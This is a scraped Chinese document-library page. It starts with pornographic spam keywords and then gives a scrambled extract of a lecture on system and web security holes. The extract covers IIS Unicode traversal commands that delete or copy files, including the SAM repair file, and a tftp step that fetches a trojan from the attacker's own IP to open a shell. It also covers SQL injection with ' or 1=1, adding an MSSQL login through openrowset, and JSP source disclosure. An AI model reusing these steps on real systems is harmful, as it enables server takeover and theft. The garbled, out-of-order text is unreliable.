freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

系統(tǒng)安全漏洞與安全檢測-文庫吧資料

2025-01-14 23:16本頁面
  

【正文】 amples/issamples/oop/ /iissamples/exair/search/ /iissamples/exair/search/ /iishelp/iis/misc/ [這個文件通常受 loopback限制 ] 利用 ,這樣同樣能訪問到 Web虛擬目錄外的文件 ,這樣請求一個 .htw文件 : /logfiles/w3svc1 /amp。 ../便可以訪問到 Web虛擬目錄外的文件 ,下面我們來看個例子 : sFile=/../../winnt/system32/logfiles/w3svc1/amp。cirestriction=noneamp。這個應(yīng)用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文件,數(shù)據(jù)庫文件,和 ASP源代碼。 ?CGI漏洞 ? or or 描述 : 危害性強(qiáng), htw,這是用于 Index Server的點(diǎn)擊功能的。 只要在后面加上一個 .就會導(dǎo)致源代碼泄漏 (可以通過瀏覽器的查看源代碼看到 )。 在訪問 JSP頁面時,如果在請求 URL的 .jsp后綴后面加上一或多個 ‘ .?、 ‘ %2E?、 ‘ +?、 ‘ %2B?、 ‘ \?、 ‘ %5C?、 ‘ %20?、‘ %00? ,會泄露 JSP源代碼。成立,所以通過了。 因?yàn)?or 1=39。 or 1=39。 and pass=39。 or 1=39。這是非常古董的方法了,這個語句會替換成這樣: select * from login where user=39。 or 1=39。$HTTP_POST_VARS[pass]39。$HTTP_POST_VARS[user]39。 ? SQL語句漏洞 描述 : 危害性強(qiáng),可以進(jìn)入網(wǎng)站的后臺應(yīng)用程序。 應(yīng)用系統(tǒng)漏洞 ? 編程語言漏洞 MDB數(shù)據(jù)庫可下載漏洞 描述 : 危害性強(qiáng),可以得到網(wǎng)站的所有內(nèi)容。 連接成功后,我們打開 WIN下的 DOS狀態(tài),輸入: NC VV 813 如果成功 如圖 不成功的話可以在 IDQGUI程序里換另一個SP補(bǔ)丁欄試試,如果都不行,就放棄。然后按右下角的 IDQ益出鍵。 測試 :來控制服務(wù)器。通過精心構(gòu)造發(fā)送數(shù)據(jù),攻擊者可以改變程序執(zhí)行流程,執(zhí)行任意代碼。這兩種腳本都由一個 ISAPI擴(kuò)展 和解釋。 ? IIS Index Server(.ida/idq) ISAPI擴(kuò)展遠(yuǎn)程溢出漏洞 描述 : 危害性極強(qiáng),它可以完作控制系統(tǒng)服務(wù)器。 漏洞的起因是: WIN2K在網(wǎng)絡(luò)打印 ISAPI擴(kuò)展上缺少足夠的緩沖區(qū)檢查,當(dāng)一個發(fā)出特殊的請求服務(wù)時產(chǎn)生緩存溢出,可以讓在本地系統(tǒng)執(zhí)行任意代碼。 *可以完全獲得和控制存在該漏洞的網(wǎng)站服務(wù)器。另一方面,假如數(shù)據(jù)是有效的程序代碼,程序?qū)凑諗?shù)據(jù)提供者所設(shè)定的要求執(zhí)行代碼和新的功能。否則,數(shù)據(jù)將溢出緩沖區(qū)并覆寫在鄰近的數(shù)據(jù)上,當(dāng)它運(yùn)行時,就如同改寫了程序。 再使用如下調(diào)用來執(zhí)行 () xe?/c+c:\ipub\scripts\ 然后您就可以 tel 99 ? printer遠(yuǎn)程緩存溢出漏洞 緩存溢出 :緩存溢出又稱為緩沖溢出,緩沖區(qū)指一個程序的記憶范圍 (領(lǐng)域 ),該領(lǐng)域是用來儲存一些數(shù)據(jù),如電腦程序信息,中間計算結(jié)果,或者輸入?yún)?shù)。 測試 1: 下面的 URL可能列出當(dāng)前目錄的內(nèi)容: winnt/system32/?/c+dir 測試 2 : 利用這個漏洞查看系統(tǒng)文件內(nèi)容也是可能的: 測試 3: 刪除空的文件夾命令: +rd+c:\snowspider 測試 4: 刪除文件的命令 : +del+c:\ 測試 5: Copy文件 ?/c+copy%20c:\winnt\repair\%20c: \ipub\root\ 測試 5: 用木馬(用 TFTP、 NCX99) 在地址欄里填入: xe?/c+tftp i ???.???.???.??? GET c:\\ipub\\scripts\\ ???.???.???.???為你自己的 IP, 注意: c:\\ipub\\scripts\\ 其中 c:\\ipub\\scripts\\為主機(jī)服務(wù)器目錄,要看主機(jī)的具體情況而定, 改名的 (自己選名字吧)。A39。39。的返回集合欺騙了本地的select請求,是命令能夠正常執(zhí)行,通理 sp_addsrvrolemember和 opendatasource也可以如此操作! ? IIS漏洞 ? IIS unicode漏洞 描述 :危害性極強(qiáng),可以完全的控制服務(wù)器。OK!39。的集合,你的機(jī)器商會顯示 OK!,同時對方的數(shù)據(jù)庫內(nèi)也會增加一個 Hectic的賬號,也就是說,我們利用 select 39。OK!39。) 這樣,命令至少會返回 select 39。 exec Hectic39。39。OK!39。39。select 39。,39。39。39。sa39。39。server39。,39。sqloledb39。 那么如果我們要調(diào)用sp_addlogin呢,他不會像 xp_cmdshell返回任何集合的,我們就不能再依靠 fmtonly設(shè)置了,可以如下操作 select * from openrowset(39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。39。 目前已知受影響的擴(kuò)展存儲過程如下: xp_printstatements () xp_proxiedmetadata () xp_SetSQLSecurity () … ? 關(guān)于 openrowset和 opendatasource 描述 : 危害性極強(qiáng),它可以完作控制系統(tǒng)服務(wù)器。c:\winnt39。 ? 擴(kuò)展存儲過程參數(shù)解析漏洞: 描述 : 危害性極強(qiáng),它可以完作控制系統(tǒng)服務(wù)器。 當(dāng)然遠(yuǎn)程的話,一般需要有 1433口開著,通過 MSSQL 客戶端進(jìn)行連接。 應(yīng)用平臺的漏洞 ? SQL SERVER存在的一些安全漏洞: ? “ SA”帳號弱口令 描述 :危害性極強(qiáng),
點(diǎn)擊復(fù)制文檔內(nèi)容
試題試卷相關(guān)推薦
文庫吧 www.dybbs8.com
備案圖鄂ICP備17016276號-1